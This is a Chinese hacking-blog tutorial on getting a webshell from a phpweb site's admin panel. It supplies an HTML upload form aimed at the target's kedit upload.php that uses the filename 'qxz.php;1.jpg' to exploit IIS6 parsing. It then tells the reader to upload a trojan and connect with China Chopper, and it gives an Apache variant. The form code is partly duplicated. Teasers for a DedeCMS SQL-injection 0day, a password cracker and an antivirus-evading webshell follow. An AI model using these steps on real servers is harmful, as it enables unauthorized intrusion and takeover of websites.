phpweb后台拿shell简单 ***
关于phpweb后台拿shell简单 *** 。
首先登录后台admin.php
登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址。
代码文件如下:
<form name=”uploadForm” method=”post” enctype=”multipart/form-data” action=”http://www.xxx.com/kedit/upload_cgi/upload.php”>
<input type=”text” name=”fileName” value=”qxz.php;1.jpg” />
<input type=”hidden” name=”attachPath” value=”news/pics/” />
<input type=”file” name=”fileData” size=”14″ /></td>
<input type=”submit” name=”button” value=”确定” />
</form>
<input type=”text” name=”fileName” value=”qxz.php;1.jpg” />
<input type=”hidden” name=”attachPath” value=”news/pics/” />
<input type=”file” name=”fileData” size=”14″ /></td>
<input type=”submit” name=”button” value=”确定” />
</form>
然后选择你的马儿再上传
上传后如果为iis6,就点击查看源码就可以找到马儿的路径了。
菜刀链接看下
PS:qxz.php;1.jpg这样的文件是允许上传的,只要服务器是IIS6就拿到webshell,低版本的apache可以试着重命名为qxz.php.jpg
代码文件下载地址:http://pan.baidu.com/s/1eRzHs
相关文章
![3389远程链接提示:你已经被拒绝登录到终端服务器[解决方案]](2020/05/31/2014030800123793.jpg)
3389远程链接提示:你已经被拒绝登录到终端服务器[解决方案]
这是3389远程桌面的连接界面,当我们连接到服务器准备数据密码登录的时候,提示:你已经被拒绝登录到终端服务器。 【解决方案】: 本地登录服务器,进入...
THCHydra是完全免费的吗?
什么叫THC Hydra? THC Hydra是一种密码破解专用工具,能够 对超出五十种协议书实行十分快的词典进攻。它是一个迅速平稳的互联网登陆黑客工具,它应用词典或暴力行为进攻来试着登陆页面上的各...
WindowsServer2003R2版本号IIS6
今天第三篇实例教程,大家立即用CVE-2017-7269系统漏洞开展一次实战演练检测。三篇文章内容你融汇贯通了,基础算黑客入门了。 微软公司层面也早已确定了该系统漏洞:Windows...
DedeCMS会员中心短消息SQL注射0day漏洞
需要:magic_quotes_gpc = Off DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码: http://www.chncto.com/de/membe...
Dradis是完全免费的吗?
什么叫Dradis? Dradis架构是一种开源系统专用工具,使客户可以在安全风险评估期内非常是合理的信息内容和信息共享。作用包含简易的汇报转化成,配件适用,根据网络服务器软件和单独服务平台与目前系...
全新提权免杀asp木马病毒
一个能够绕开当今目前市面上基本上全部Webshell查杀的免杀PHP一句话木马脚本制作。...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!